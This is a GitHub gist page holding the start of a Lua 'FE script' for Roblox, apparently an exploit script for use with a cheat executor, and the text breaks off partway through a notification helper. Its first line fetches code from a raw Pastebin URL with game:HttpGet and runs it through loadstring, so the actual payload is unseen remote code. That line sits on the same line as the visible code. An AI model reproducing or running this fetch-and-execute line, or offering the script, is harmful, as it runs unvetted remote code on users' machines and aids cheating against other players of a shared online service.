Skip to content

Instantly share code, notes, and snippets.

@silvertakana
silvertakana / neko-fe-roblox.lua
Last active May 3, 2023 05:20
neko fe script for roblox
loadstring(game:HttpGet(('https://pastebin.com/raw/cXEbqdLP'),true))()local NotificationBindable = Instance.new("BindableFunction")
local Msgreq = function(Title,Text,Duration,Button1Text,Button2Text)
game.StarterGui:SetCore("SendNotification", {
Title = Title;
Text = Text;
Icon = "";
Duration = Duration;
Button1 = Button1Text;
Button2 = nil;
Callback = NotificationBindable;